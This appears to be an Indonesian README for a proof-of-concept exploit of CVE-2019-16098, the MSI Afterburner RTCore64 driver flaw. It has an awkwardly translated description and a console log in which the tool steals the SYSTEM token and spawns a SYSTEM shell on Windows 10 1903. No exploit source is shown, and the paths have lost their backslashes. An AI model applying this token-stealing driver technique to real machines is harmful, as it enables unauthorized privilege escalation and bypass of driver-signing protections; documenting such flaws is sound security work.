CVE 2019 16098
1.0.0
Driver dalam MSI bintang mikro afterburner 4.6.2.15658 (alias rtcore64.sys dan rtcore32.sys) memungkinkan pengguna yang diautentikasi untuk membaca dan menulis ke memori sewenang-wenang, port I/O, dan MSR. Ini dapat dieksploitasi untuk eskalasi hak istimewa, eksekusi kode di bawah hak istimewa, dan pengungkapan informasi. Driver yang ditandatangani ini juga dapat digunakan untuk memotong kebijakan penandatanganan driver Microsoft untuk menggunakan kode berbahaya.
Untuk pembaruan lebih lanjut, kunjungi CVE-2019-16098
PERINGATAN : Offset Windows 10 X64 Versi 1903 Hardcoded!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
Barakat
C:UsersBarakatsourcereposCVE-2019-16098>outbuildx64-DebugCVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
SYSTEM
C:UsersBarakatsourcereposCVE-2019-16098>
